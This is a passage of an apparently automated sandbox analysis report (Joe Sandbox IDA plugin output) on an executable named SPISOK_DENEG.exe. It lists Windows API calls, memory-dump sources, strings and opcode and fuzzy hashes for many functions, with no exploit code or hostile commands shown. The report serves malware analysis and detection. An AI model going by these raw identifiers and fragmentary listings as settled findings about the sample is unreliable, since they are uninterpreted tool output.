                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: %s%s%u
                                                            • API String ID: 110358324-1360425832
                                                            • Opcode ID: 5f2bfd0f6674cd4e8f2a70b177b93c0331a7f895f6a4ef1f48b72aefa626f4b4
                                                            • Instruction ID: a4517c6670fe7fbced3180e6926f43b8984c10619837b797b2ce96162fbaeb59
                                                            • Opcode Fuzzy Hash: 5f2bfd0f6674cd4e8f2a70b177b93c0331a7f895f6a4ef1f48b72aefa626f4b4
                                                            • Instruction Fuzzy Hash: 4F418FB1900298AEDF659B61CC45EEE77FDEB05300F4080A7F909F7541EA719A858FA1
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 000DBB27
                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,000DA275,?,?,00000800,?,000DA23A,?,000D755C), ref: 000DBBC5
                                                            • _wcslen.LIBCMT ref: 000DBC3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CurrentDirectory
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 3341907918-253988292
                                                            • Opcode ID: b18987b08de7fc3d1f91a395a6f86ef4acf5711fea84b3b597ee3f698490ba54
                                                            • Instruction ID: 1f317ced52c6ac5df3291aa1f4397ffb453438e36fa5b5e18149c84fdf9122c6
                                                            • Opcode Fuzzy Hash: b18987b08de7fc3d1f91a395a6f86ef4acf5711fea84b3b597ee3f698490ba54
                                                            • Instruction Fuzzy Hash: 5D418C35410359EACF21AF21CC01EEF77A9BF45790F114467F964A3292EBB09A908B70
                                                            APIs
                                                            • LoadBitmapW.USER32(00000065), ref: 000EB6ED
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 000EB712
                                                            • DeleteObject.GDI32(00000000), ref: 000EB744
                                                            • DeleteObject.GDI32(00000000), ref: 000EB767
                                                              • Part of subcall function 000EA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,000EB73D,00000066), ref: 000EA6D5
                                                              • Part of subcall function 000EA6C2: SizeofResource.KERNEL32(00000000,?,?,?,000EB73D,00000066), ref: 000EA6EC
                                                              • Part of subcall function 000EA6C2: LoadResource.KERNEL32(00000000,?,?,?,000EB73D,00000066), ref: 000EA703
                                                              • Part of subcall function 000EA6C2: LockResource.KERNEL32(00000000,?,?,?,000EB73D,00000066), ref: 000EA712
                                                              • Part of subcall function 000EA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,000EB73D,00000066), ref: 000EA72D
                                                              • Part of subcall function 000EA6C2: GlobalLock.KERNEL32(00000000), ref: 000EA73E
                                                              • Part of subcall function 000EA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 000EA762
                                                              • Part of subcall function 000EA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 000EA7A7
                                                              • Part of subcall function 000EA6C2: GlobalUnlock.KERNEL32(00000000), ref: 000EA7C6
                                                              • Part of subcall function 000EA6C2: GlobalFree.KERNEL32(00000000), ref: 000EA7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                            • String ID: ]
                                                            • API String ID: 1797374341-3352871620
                                                            • Opcode ID: ad23587ef98e1981fcf0516984c8ab7131b6440f14421d40e7aa8b85700cc9fa
                                                            • Instruction ID: bca7a08176895584c36e8c6dd9fa30017fcd5881f6052257c2cc300d3a8bc269
                                                            • Opcode Fuzzy Hash: ad23587ef98e1981fcf0516984c8ab7131b6440f14421d40e7aa8b85700cc9fa
                                                            • Instruction Fuzzy Hash: CE014532A00241AFD71277768C49AFFBAB99FC6B62F080011F990B7292DF318D4942A1
                                                            APIs
                                                              • Part of subcall function 000D1316: GetDlgItem.USER32(00000000,00003021), ref: 000D135A
                                                              • Part of subcall function 000D1316: SetWindowTextW.USER32(00000000,001035F4), ref: 000D1370
                                                            • EndDialog.USER32(?,00000001), ref: 000ED64B
                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 000ED661
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 000ED675
                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 000ED684
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: RENAMEDLG
                                                            • API String ID: 445417207-3299779563
                                                            • Opcode ID: c2c03266a667748012923608fb55df79b0f2e06744658d6bd9bfd7bbbb23ff7f
                                                            • Instruction ID: 1a302616e1e7d04b942e4e6ecb2a8ef6d735b16e8817e273e4040533c0de0e10
                                                            • Opcode Fuzzy Hash: c2c03266a667748012923608fb55df79b0f2e06744658d6bd9bfd7bbbb23ff7f
                                                            • Instruction Fuzzy Hash: 5A012833284354BED2244F659E09F5B77ADFB5AB01F010416F305B24D0C7A2D9559B79
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000F7E24,00000000,?,000F7DC4,00000000,0010C300,0000000C,000F7F1B,00000000,00000002), ref: 000F7E93
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000F7EA6
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,000F7E24,00000000,?,000F7DC4,00000000,0010C300,0000000C,000F7F1B,00000000,00000002), ref: 000F7EC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: b0ed5efdd04ecbc36358758b5d4ca933d0a12ba6523dc276683021aad76da0d7
                                                            • Instruction ID: 2819a5bee7949df4fd6f257a5bc6c8d3e531d364ffef3bfd43be2a5a3f2b6fd5
                                                            • Opcode Fuzzy Hash: b0ed5efdd04ecbc36358758b5d4ca933d0a12ba6523dc276683021aad76da0d7
                                                            • Instruction Fuzzy Hash: 5CF0683190420CBBDB119FA5DC09BEEBFF8EF44711F0040A9F859E2550DBB09E80DA91
                                                            APIs
                                                              • Part of subcall function 000E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000E0836
                                                              • Part of subcall function 000E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000DF2D8,Crypt32.dll,00000000,000DF35C,?,?,000DF33E,?,?,?), ref: 000E0858
                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 000DF2E4
                                                            • GetProcAddress.KERNEL32(001181C8,CryptUnprotectMemory), ref: 000DF2F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                            • API String ID: 2141747552-1753850145
                                                            • Opcode ID: 61ca9ef80f1d68ac04cb57594b3c2b673ae7259608f6ce65913c47d5ee863bd4
                                                            • Instruction ID: d36eac743f52cdd5b45fa0ac7afea1fc266f58d2bdb4fdd502527b28423f46c1
                                                            • Opcode Fuzzy Hash: 61ca9ef80f1d68ac04cb57594b3c2b673ae7259608f6ce65913c47d5ee863bd4
                                                            • Instruction Fuzzy Hash: B0E04F70A11742AEC7219F35984DB517AD86F04700B14C81EF0EAE3A84DBF4D5818B50
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AdjustPointer$_abort
                                                            • String ID:
                                                            • API String ID: 2252061734-0
                                                            • Opcode ID: a513f52d22200e8eaa9f5fd80ec5c1efb9e4beb16ef387f6af1125a68881208e
                                                            • Instruction ID: 098bad81afd4567d7310c5396db67dc9ea47c9ae53cd8dd6c1850c42493085f1
                                                            • Opcode Fuzzy Hash: a513f52d22200e8eaa9f5fd80ec5c1efb9e4beb16ef387f6af1125a68881208e
                                                            • Instruction Fuzzy Hash: EF51E17260121AAFEB298F14D845BBA77A4FF54310F24412DEE0147EA2D732ED90FB90
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 000FBF39
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000FBF5C
                                                              • Part of subcall function 000F8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,000FCA2C,00000000,?,000F6CBE,?,00000008,?,000F91E0,?,?,?), ref: 000F8E38
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 000FBF82
                                                            • _free.LIBCMT ref: 000FBF95
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000FBFA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: 8647f0ab0a18f4b22f35066ff24e64b68758aa1f040ccb68b0b293748648b93b
                                                            • Instruction ID: ab9ff7420327520968f397df99f9ff74160e9fd350920a8a0adf7a3ac6f02890
                                                            • Opcode Fuzzy Hash: 8647f0ab0a18f4b22f35066ff24e64b68758aa1f040ccb68b0b293748648b93b
                                                            • Instruction Fuzzy Hash: 4E0184726056197F632116769C4DDBB7AADDFC6BA13144139FB04C2941EFB08D06A9B0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,000F91AD,000FB188,?,000F9813,00000001,00000364,?,000F3F73,00000050,?,00111030,00000200), ref: 000F986E
                                                            • _free.LIBCMT ref: 000F98A3
                                                            • _free.LIBCMT ref: 000F98CA
                                                            • SetLastError.KERNEL32(00000000,?,00111030,00000200), ref: 000F98D7
                                                            • SetLastError.KERNEL32(00000000,?,00111030,00000200), ref: 000F98E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 3075967a32d39392842349394f58c691dd4478a169c373a5d740cc514d913b60
                                                            • Instruction ID: 0b07ab819b17e74b5dafd85586bc5c217d049a271833e3a303c0bdd45401aee4
                                                            • Opcode Fuzzy Hash: 3075967a32d39392842349394f58c691dd4478a169c373a5d740cc514d913b60
                                                            • Instruction Fuzzy Hash: C201D13624560D6BC3226666AC85BBB36AD9FD37E0B240136F71592D92EEB08C027261
                                                            APIs
                                                              • Part of subcall function 000E11CF: ResetEvent.KERNEL32(?), ref: 000E11E1
                                                              • Part of subcall function 000E11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 000E11F5
                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 000E0F21
                                                            • CloseHandle.KERNEL32(?,?), ref: 000E0F3B
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 000E0F54
                                                            • CloseHandle.KERNEL32(?), ref: 000E0F60
                                                            • CloseHandle.KERNEL32(?), ref: 000E0F6C
                                                              • Part of subcall function 000E0FE4: WaitForSingleObject.KERNEL32(?,000000FF,000E1206,?), ref: 000E0FEA
                                                              • Part of subcall function 000E0FE4: GetLastError.KERNEL32(?), ref: 000E0FF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 1868215902-0
                                                            • Opcode ID: 1a31386653b9a91d081c792fae87ae2a570fd17b1884c4d9b6b4e380f15f767d
                                                            • Instruction ID: 2b6f69c0b41e00ffbbcd5c349477ecea802415ddd363c7428cd0b98c3663d46a
                                                            • Opcode Fuzzy Hash: 1a31386653b9a91d081c792fae87ae2a570fd17b1884c4d9b6b4e380f15f767d
                                                            • Instruction Fuzzy Hash: 57017571101744EFC7229B65DC88BC6FBADFB08710F004929F1AB62564CBB57A95CB50
                                                            APIs
                                                            • _free.LIBCMT ref: 000FC817
                                                              • Part of subcall function 000F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?), ref: 000F8DE2
                                                              • Part of subcall function 000F8DCC: GetLastError.KERNEL32(?,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?,?), ref: 000F8DF4
                                                            • _free.LIBCMT ref: 000FC829
                                                            • _free.LIBCMT ref: 000FC83B
                                                            • _free.LIBCMT ref: 000FC84D
                                                            • _free.LIBCMT ref: 000FC85F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 4e9f4ecea28fd936ffda7dac55cb575bddc74295ecaeec6a8ceb9f62f120655c
                                                            • Instruction ID: 295ed2d7914801f2105597cad9c3f4d85ef8269739e20846135f2acea136de3f
                                                            • Opcode Fuzzy Hash: 4e9f4ecea28fd936ffda7dac55cb575bddc74295ecaeec6a8ceb9f62f120655c
                                                            • Instruction Fuzzy Hash: 38F0623250420CABD764EB69E586CA673E9AF007907584C19F348D7D92CFB0FC81EB50
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 000E1FE5
                                                            • _wcslen.LIBCMT ref: 000E1FF6
                                                            • _wcslen.LIBCMT ref: 000E2006
                                                            • _wcslen.LIBCMT ref: 000E2014
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,000DB371,?,?,00000000,?,?,?), ref: 000E202F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CompareString
                                                            • String ID:
                                                            • API String ID: 3397213944-0
                                                            • Opcode ID: 90bf0a66382dccfc89a83f1ef7aecd3c5bc01e65762324116004362fcf773f34
                                                            • Instruction ID: 50147f7a10ac80ae1aa3b45f69bbab41f658dba2d826fc5447742ef66948888c
                                                            • Opcode Fuzzy Hash: 90bf0a66382dccfc89a83f1ef7aecd3c5bc01e65762324116004362fcf773f34
                                                            • Instruction Fuzzy Hash: 92F03032008058BFDF226F51EC09DDE7F2AEF54770B118415F61A6B4A2CB72D6A1E6D0
                                                            APIs
                                                            • _free.LIBCMT ref: 000F891E
                                                              • Part of subcall function 000F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?), ref: 000F8DE2
                                                              • Part of subcall function 000F8DCC: GetLastError.KERNEL32(?,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?,?), ref: 000F8DF4
                                                            • _free.LIBCMT ref: 000F8930
                                                            • _free.LIBCMT ref: 000F8943
                                                            • _free.LIBCMT ref: 000F8954
                                                            • _free.LIBCMT ref: 000F8965
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 2993722739e30d27c507b9a2823078bb2aa91ddfa901ce42133c64912cb76220
                                                            • Instruction ID: 6874e62824763a763a84f30671af68a3f8b03f68833960989a2f34f68bb612b4
                                                            • Opcode Fuzzy Hash: 2993722739e30d27c507b9a2823078bb2aa91ddfa901ce42133c64912cb76220
                                                            • Instruction Fuzzy Hash: A7F0FEB181062A9BC7467F14FD034A63FF1FF257543054906F65456EB2CBB149C1EB81
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _swprintf
                                                            • String ID: %ls$%s: %s
                                                            • API String ID: 589789837-2259941744
                                                            • Opcode ID: dcf6aa94ee417e0c4bb2cd59ca143bf7151c82fa27419352a532caeddde572c9
                                                            • Instruction ID: b2dca7a218614969f1b3dce95f52d19e23f7951bd36ae5536557884d9333d027
                                                            • Opcode Fuzzy Hash: dcf6aa94ee417e0c4bb2cd59ca143bf7151c82fa27419352a532caeddde572c9
                                                            • Instruction Fuzzy Hash: E251E97524C3C0FFE63126928D46FFD7665AB15F48F244507F3D6784E2C9B2A410A72A
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SPISOK_DENEG.exe,00000104), ref: 000F7FAE
                                                            • _free.LIBCMT ref: 000F8079
                                                            • _free.LIBCMT ref: 000F8083
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\SPISOK_DENEG.exe
                                                            • API String ID: 2506810119-65320021
                                                            • Opcode ID: ab59fdf1ae0ade54007996a506dc3b770eb77059f95bbf7893b65cbae8085496
                                                            • Instruction ID: e72b05ca5945964f270db0f26f6575034c578a117512d02573b1747ab2bd47b7
                                                            • Opcode Fuzzy Hash: ab59fdf1ae0ade54007996a506dc3b770eb77059f95bbf7893b65cbae8085496
                                                            • Instruction Fuzzy Hash: 0E31A0B1A0021DAFDB61EF95DC819EEBBFCEF85310F508066FA0497611DB708A84EB51
                                                            APIs
